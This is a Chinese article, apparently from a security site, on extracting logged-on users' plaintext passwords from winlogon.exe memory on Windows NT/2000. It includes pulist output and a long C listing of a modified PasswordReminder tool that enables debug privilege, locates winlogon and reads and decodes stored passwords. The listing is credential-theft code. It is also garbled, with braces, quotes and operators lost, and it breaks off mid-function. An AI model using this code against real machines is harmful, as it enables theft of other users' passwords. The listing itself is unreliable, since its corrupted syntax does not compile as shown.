




winlogon.exe(Windows Logon Process)是 Windows NT 的用户登录程序,负责管理用户的登录和退出。登录的域名和用户名以明文形式保存在 winlogon 进程中;而 Password(从下文代码的输出信息看,应指原程序 PasswordReminder)只查找当前进程所属用户的密码:它到 winlogon 进程的地址空间中查找 UserDomain 和 UserName,找到后再读取其后的加密口令。其实只要自己指定用户名和 winlogon 进程去查找即可:只要具有管理员权限,任何在本机通过 msgina.dll 图形界面登录的用户,其口令都可以被找到。从防御角度看,这意味着在下文代码所针对的 Windows NT / Windows 2000 上,本机管理员(能够启用 SeDebugPrivilege 并读取 winlogon 进程内存)实际上可以获得所有已交互登录用户的口令,因此应严格限制管理员权限,并审计调试特权的启用以及对 winlogon.exe 的跨进程内存读取。

1. 用 pulist 找出系统中已登录的域名和用户名,以及各 winlogon 进程的 id;
2. 然后针对每个 winlogon 进程 id 查找指定的用户即可。

example:

C:\Documents and Settings\bingle>pulist
Process           PID  User
Idle              0
System            8
smss.exe          164  NT AUTHORITY\SYSTEM
csrss.exe         192  NT AUTHORITY\SYSTEM
winlogon.exe      188  NT AUTHORITY\SYSTEM
wins.exe          1212 NT AUTHORITY\SYSTEM
Explorer.exe      388  TEST-2KSERVER\Administrator
internat.exe      1828 TEST-2KSERVER\Administrator
conime.exe        1868 TEST-2KSERVER\Administrator
msiexec.exe       1904 NT AUTHORITY\SYSTEM
tlntsvr.exe       1048 NT AUTHORITY\SYSTEM
taskmgr.exe       1752 TEST-2KSERVER\Administrator
csrss.exe         2056 NT AUTHORITY\SYSTEM
winlogon.exe      2416 NT AUTHORITY\SYSTEM
rdpclip.exe       2448 TEST-2KSERVER\clovea
Explorer.exe      2408 TEST-2KSERVER\clovea
internat.exe      1480 TEST-2KSERVER\clovea
cmd.exe           2508 TEST-2KSERVER\Administrator
ntshell.exe       368  TEST-2KSERVER\Administrator
ntshell.exe       1548 TEST-2KSERVER\Administrator
ntshell.exe       1504 TEST-2KSERVER\Administrator
csrss.exe         1088 NT AUTHORITY\SYSTEM
winlogon.exe      1876 NT AUTHORITY\SYSTEM
rdpclip.exe       1680 TEST-2KSERVER\bingle
Explorer.exe      2244 TEST-2KSERVER\bingle
conime.exe        2288 TEST-2KSERVER\bingle
internat.exe      1592 TEST-2KSERVER\bingle
cmd.exe           1692 TEST-2KSERVER\bingle
mdm.exe           2476 TEST-2KSERVER\bingle
taskmgr.exe       752  TEST-2KSERVER\bingle
pulist.exe        2532 TEST-2KSERVER\bingle

具体实现代码如下(该代码清单在网页抽取过程中丢失了花括号、引号、方括号和部分运算符,并在页面末尾被截断,无法直接编译,仅供阅读理解其流程):

#include #include #include #include typedef struct _UNICODE_STRING USHORT Length; USHORT MaximumLength; PWSTR Buffer; UNICODE_STRING, *PUNICODE_STRING; / Undocumented typedefs typedef struct _QUERY_SYSTEM_INFORMATION DWORD GrantedAccess; DWORD PID; WORD HandleType; WORD HandleId; DWORD Handle; QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION; typedef struct _PROCESS_INFO_HEADER DWORD Count; DWORD Unk04; DWORD Unk08; PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER; typedef struct _PROCESS_INFO DWORD LoadAddress; 
DWORD Size; DWORD Unk08; DWORD Enumerator; DWORD Unk10; char Name 0x108; PROCESS_INFO, *PPROCESS_INFO; typedef struct _ENCODED_PASSWORD_INFO DWORD HashByte; DWORD Unk04; DWORD Unk08; DWORD Unk0C; FILETIME LoggedOn; DWORD Unk18; DWORD Unk1C; DWORD Unk20; DWORD Unk24; DWORD Unk28; UNICODE_STRING EncodedPassword; ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO; typedef DWORD (_stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD); typedef PVOID (_stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD); typedef DWORD (_stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID); typedef void (_stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID); typedef void (_stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING); / Private Prototypes BOOL IsWinNT (void); BOOL IsWin2K (void); BOOL AddDebugPrivilege (void); DWORD FindWinLogon (void); BOOL LocatePasswordPageWinNT (DWORD, PDWORD); BOOL LocatePasswordPageWin2K (DWORD, PDWORD); void DisplayPasswordWinNT (void); void DisplayPasswordWin2K (void); / Global Variables PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation; PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer; PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation; PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer; PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString; DWORD PasswordLength = 0; PVOID RealPasswordP = NULL; PVOID PasswordP = NULL; DWORD HashByte = 0; wchar_t UserName 0x400; wchar_t UserDomain 0x400; int _cdecl main( int argc, char* argv ) printf( nt To Find Password in the Winlogon processn ); printf( Usage: %s DomainName UserName PID-of-WinLogonnn, argv0 ); if (!IsWinNT () & (!IsWin2K () printf (Windows NT or Windows 2000 are required.n); return (0); / Add debug privilege to PasswordReminder - / this is needed for the search for Winlogon. 
/ 增加PasswordReminder的权限 / 使得PasswordReminder可以打开并调试Winlogon进程 if (!AddDebugPrivilege () printf (Unable to add debug privilege.n); return (0); printf (The debug privilege has been added to PasswordReminder.n); / 获得几个未公开API的入口地址 HINSTANCE hNtDll = LoadLibrary (NTDLL.DLL); pfnNtQuerySystemInformation = (PFNNTQUERYSYSTEMINFORMATION) GetProcAddress (hNtDll, NtQuerySystemInformation); pfnRtlCreateQueryDebugBuffer = (PFNRTLCREATEQUERYDEBUGBUFFER) GetProcAddress (hNtDll, RtlCreateQueryDebugBuffer); pfnRtlQueryProcessDebugInformation = (PFNRTLQUERYPROCESSDEBUGINFORMATION) GetProcAddress (hNtDll, RtlQueryProcessDebugInformation); pfnRtlDestroyQueryDebugBuffer = (PFNRTLDESTROYQUERYDEBUGBUFFER) GetProcAddress (hNtDll, RtlDestroyQueryDebugBuffer); pfnRtlRunDecodeUnicodeString = (PFNTRTLRUNDECODEUNICODESTRING) GetProcAddress (hNtDll, RtlRunDecodeUnicodeString); / Locate WinLogons PID - need debug privilege and admin rights. / 获得Winlogon进程的PID / 这里作者使用了几个Native API,其实使用PSAPI一样可以 DWORD WinLogonPID = argc 3 ? atoi( argv3 ) : FindWinLogon () ; if (WinLogonPID = 0) printf (PasswordReminder is unable to find WinLogon or you are using NWGINA.DLL.n); printf (PasswordReminder is unable to find the password in memory.n); FreeLibrary (hNtDll); return (0); printf(The WinLogon process id is %d (0x%8.8lx).n, WinLogonPID, WinLogonPID); / Set values to check memory block against. / 初始化几个和用户账号相关的变量 memset(UserName, 0, sizeof (UserName); memset(UserDomain, 0, sizeof (UserDomain); if( argc 2 ) mbstowcs( UserName, argv2, sizeof(UserName)/sizeof(*UserName) ); mbstowcs( UserDomain, argv1, sizeof(UserDomain)/sizeof(*UserDomain) ); else GetEnvironmentVariableW(LUSERNAME, UserName, 0x400); GetEnvironmentVariableW(LUSERDOMAIN, UserDomain, 0x400); printf( To find %S%S password in process %d .n, UserDomain, UserName, WinLogonPID ); / Locate the block of memory containing / the password in WinLogons memory space. 
/ 在Winlogon进程中定位包含Password的内存块 BOOL FoundPasswordPage = FALSE; if (IsWin2K () FoundPasswordPage = LocatePasswordPageWin2K (WinLogonPID, &PasswordLength); elseFoundPasswordPage = LocatePasswordPageWinNT (WinLogonPID, &PasswordLength); if (FoundPasswordPage) if (PasswordLength = 0) printf (The logon information is: %S/%S.n, UserDomain, UserName); printf (There is no password.n); else printf (The encoded password is found at 0x%8.8lx and has a length of %d.n, RealPasswordP, PasswordLength); / Decode the password string. if (IsWin2K () DisplayPasswordWin2K (); elseDisplayPasswordWinNT (); elseprintf (PasswordReminder is unable to find the password in memory.n); FreeLibrary (hNtDll); return (0); / main / / IsWinNT函数用来判断操作系统是否WINNT / BOOL IsWinNT (void) OSVERSIONINFO OSVersionInfo; OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); if (GetVersionEx (&OSVersionInfo) return (OSVersionInfo.dwPlatformId = VER_PLATFORM_WIN32_NT); elsereturn (FALSE); / IsWinNT / / IsWin2K函数用来判断操作系统是否Win2K / BOOL IsWin2K (void) OSVERSIONINFO OSVersionInfo; OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); if (GetVersionEx (&OSVersionInfo) return (OSVersionInfo.dwPlatformId = VER_PLATFORM_WIN32_NT) & (OSVersionInfo.dwMajorVersion = 5); elsereturn (FALSE); / IsWin2K / / AddDebugPrivilege函数用来申请调试Winlogon进程的特权 / BOOL AddDebugPrivilege (void) HANDLE Token; TOKEN_PRIVILEGES TokenPrivileges, PreviousState; DWORD ReturnLength = 0; if (OpenProcessToken (GetCurrentProcess (), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &Token) if (LookupPrivilegeValue (NULL, SeDebugPrivilege, &TokenPrivileges.Privileges0.Luid) TokenPrivileges.PrivilegeCount = 1; TokenPrivileges.Privileges0.Attributes = SE_PRIVILEGE_ENABLED; return(AdjustTokenPrivileges (Token, FALSE, &TokenPrivileges, sizeof (TOKEN_PRIVILEGES), &PreviousState, &ReturnLength); return (FALSE); / AddDebugPrivilege / / Note that the following code eliminates the need / for PSAPI.DLL as part of the executable. 
/ FindWinLogon函数用来寻找WinLogon进程 / 由于作者使用的是Native API,因此不需要PSAPI的支持 / DWORD FindWinLogon (void) #define INITIAL_ALLOCATION 0x100 DWORD rc = 0; DWORD SizeNeeded = 0; PVOID InfoP = HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, INITIAL_ALLOCATION); / Find how much memory is required. pfnNtQuerySystemInformation (0x10, InfoP, INITIAL_ALLOCATION, &SizeNeeded); HeapFree (GetProcessHeap (), 0, InfoP); / Now, allocate the proper amount of memory. InfoP = HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, SizeNeeded); DWORD SizeWritten = SizeNeeded; if (pfnNtQuerySystemInformation (0x10, InfoP, SizeNeeded, &SizeWritten) HeapFree (GetProcessHeap (), 0, InfoP); return (0); DWORD NumHandles = SizeWritten / sizeof (QUERY_SYSTEM_INFORMATION); if (NumHandles = 0) HeapFree (GetProcessHeap (), 0, InfoP); return (0); PQUERY_SYSTEM_INFORMATION QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION) InfoP; DWORD i; for (i = 1; i HandleType = 5) PVOID DebugBufferP = pfnRtlCreateQueryDebugBuffer (0, 0); if (pfnRtlQueryProcessDebugInformation (QuerySystemInformationP-PID, 1, DebugBufferP) = 0) PPROCESS_INFO_HEADER ProcessInfoHeaderP = (PPROCESS_INFO_HEADER) (DWORD) DebugBufferP + 0x60); DWORD Count = ProcessInfoHeaderP-Count; PPROCESS_INFO ProcessInfoP = (PPROCESS_INFO) (DWORD) ProcessInfoHeaderP + sizeof (PROCESS_INFO_HEADER); if (strstr (_strupr (ProcessInfoP-Name), WINLOGON) != 0) DWORD i; DWORD dw = (DWORD) ProcessInfoP; for (i = 0; i Name), NWGINA) != 0) return (0); if (strstr (_strupr (ProcessInfoP-Name), MSGINA) = 0) rc = QuerySystemInformationP-PID; if (DebugBufferP) pfnRtlDestroyQueryDebugBuffer (DebugBufferP); HeapFree (GetProcessHeap (), 0, InfoP); return (rc); if (DebugBufferP) pfnRtlDestroyQueryDebugBuffer (DebugBufferP); DWORD dw = (DWORD) QuerySystemInformationP; dw += sizeof (QUERY_SYSTEM_INFORMATION); QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION) dw; HeapFree (GetProcessHeap (), 0, InfoP); return (rc); / FindWinLogon / / LocatePasswordPageWinNT函数用来在NT中找到用户密码 / BOOL 
LocatePasswordPageWinNT (DWORD WinLogonPID, PDWORD PasswordLength) #define USER_DOMAIN_OFFSET_WINNT 0x200 #define USER_PASSWORD_OFFSET_WINNT 0x400 BOOL rc = FALSE; HANDLE WinLogonHandle = OpenProcess (PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, WinLogonPID); if (WinLogonHandle = 0) return (rc); *PasswordLength = 0; SYSTEM_INFO SystemInfo; GetSystemInfo (&SystemInfo); DWORD PEB = 0x7ffdf000; DWORD BytesCopied = 0; PVOID PEBP = HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, SystemInfo.dwPageSize); if (!ReadProcessMemory (WinLogonHandle, (PVOID) PEB, PEBP, SystemInfo.dwPageSize, &BytesCopied) Clos